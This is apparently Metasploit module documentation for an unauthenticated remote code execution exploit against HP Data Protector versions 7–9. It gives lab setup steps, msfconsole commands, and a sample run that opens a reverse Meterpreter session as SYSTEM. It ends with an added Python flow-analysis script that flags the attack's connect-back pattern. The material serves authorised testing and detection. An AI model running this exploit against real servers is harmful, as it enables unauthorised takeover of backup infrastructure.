HP Data Protector is automated backup and recovery software for single-server to enterprise
environments. It provides cross-platform, online backup of data for Microsoft Windows, Unix,
and Linux operating systems.

When the server is using Encrypted Control Communication, HP Data Protector allows a remote
attacker to gain access without authentication and execute arbitrary code in the
context of SYSTEM.


## Vulnerable Application

HP Data Protector versions 7, 8, and 9 are known to be affected.

This module was tested against version 9.0.0 on Windows 2008.

## Verification Steps

**Installing HP Data Protector**

Before installing HP Data Protector, a Windows domain controller is needed. This exploit was tested
against [a Windows Server 2008 R2 SP1 domain controller](https://www.youtube.com/watch?v=Buj9oEgbRt8).

After setting up the domain controller, double-click on the HP Data Protector installer, and you
should see this screen:

![screen_1](https://cloud.githubusercontent.com/assets/13082457/15794665/99a86238-29e4-11e6-8ccd-0e09b0c8a693.png)

Click on **Install Data Protector**. The installer should then ask which installation type you want:

![screen_2](https://cloud.githubusercontent.com/assets/13082457/15794701/de31d07e-29e4-11e6-9410-0b88abe77afe.png)

Make sure to select **Cell Manager**, and click **Next**. Use all default settings.

**Enabling Encrypted Communication**

After the Setup Wizard is finished, we need to enable encrypted communication. First, open the
Data Protector GUI:

![screen_3](https://cloud.githubusercontent.com/assets/1170914/15845344/d3a84ee4-2c37-11e6-821d-fe8002c94686.png)

Click on **Clients**, then select the local client from the tree. You should see the **Connection** tab on the
right; click on it.

![screen_4](https://cloud.githubusercontent.com/assets/1170914/15845351/df9929f8-2c37-11e6-9d82-8c519c030a5f.png)

Under the Connection tab, there should be an **Encrypted control communication** checkbox. Make
sure it is checked, and then click **Apply**.

**Using hp_dataprotector_encrypted_comms**

After the encrypted communication is enabled, you are ready to use
hp_dataprotector_encrypted_comms. Here is what you do:

1. Start msfconsole
2. Do: ```use exploit/windows/misc/hp_dataprotector_encrypted_comms```
3. Do: ```set RHOST [IP ADDRESS]```
4. Do: ```set PAYLOAD [PAYLOAD NAME]```
5. Set other options as needed
6. Do: ```exploit```, and you should receive a session like the following:

```
msf exploit(hp_dataprotector_encrypted_comms) > run

[*] Started reverse TCP handler on 172.16.23.1:4444 
[*] 172.16.23.173:5555 - Initiating connection
[*] 172.16.23.173:5555 - Establishing encrypted channel
[*] 172.16.23.173:5555 - Sending payload
[*] 172.16.23.173:5555 - Waiting for payload execution (this can take up to 30 seconds or so)
[*] Sending stage (957999 bytes) to 172.16.23.173
[*] Meterpreter session 1 opened (172.16.23.1:4444 -> 172.16.23.173:49304) at 2016-06-06 22:16:54 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
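
For defenders, the session output above shows a pattern that is visible in network flow data: an inbound connection to the Data Protector port 5555 from a host that is not a cell member, followed shortly afterwards by the server opening a connection back to that same peer. The following is an added example, not part of the module or the original documentation, that flags this pattern; the CSV flow format, the addresses, the allow-list and the 60-second window are all constructed assumptions.

```python
import csv
import io
from datetime import datetime, timedelta

DP_PORT = 5555                   # control port shown in the module output above
WINDOW = timedelta(seconds=60)   # assumption: covers the "up to 30 seconds" payload delay
# Hypothetical allow-list: the cell manager and its known clients.
CELL_HOSTS = {"192.0.2.10", "192.0.2.11", "192.0.2.20"}

# Constructed flow records: time, src, sport, dst, dport
SAMPLE_FLOWS = """\
2016-06-06T22:10:01,192.0.2.10,51200,192.0.2.20,5555
2016-06-06T22:16:30,198.51.100.7,40112,192.0.2.20,5555
2016-06-06T22:16:54,192.0.2.20,49304,198.51.100.7,4444
2016-06-06T22:20:00,192.0.2.20,49400,192.0.2.11,5555
"""

def parse_flows(text):
    """Parse CSV flow lines into dicts with typed fields."""
    rows = (r for r in csv.reader(io.StringIO(text)) if r)
    return [{"ts": datetime.fromisoformat(t), "src": s, "sport": int(sp),
             "dst": d, "dport": int(dp)} for t, s, sp, d, dp in rows]

def find_suspicious(flows, cell_hosts=CELL_HOSTS, window=WINDOW):
    """Alert on non-cell peers reaching DP_PORT; raise severity on a connect-back."""
    alerts = []
    flows = sorted(flows, key=lambda f: f["ts"])
    for f in flows:
        if f["dport"] != DP_PORT or f["src"] in cell_hosts:
            continue
        # Did the server open a connection back to the same peer within the window?
        callbacks = [g for g in flows
                     if g["src"] == f["dst"] and g["dst"] == f["src"]
                     and f["ts"] < g["ts"] <= f["ts"] + window]
        alerts.append({"server": f["dst"], "peer": f["src"], "ts": f["ts"],
                       "severity": "high" if callbacks else "medium",
                       "callback_ports": [g["dport"] for g in callbacks]})
    return alerts

if __name__ == "__main__":
    for alert in find_suspicious(parse_flows(SAMPLE_FLOWS)):
        print(alert)
```

An alert with severity `medium` means the port was reached by an unexpected host; `high` means the server also connected back to that host, which warrants immediate triage of the Data Protector server.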

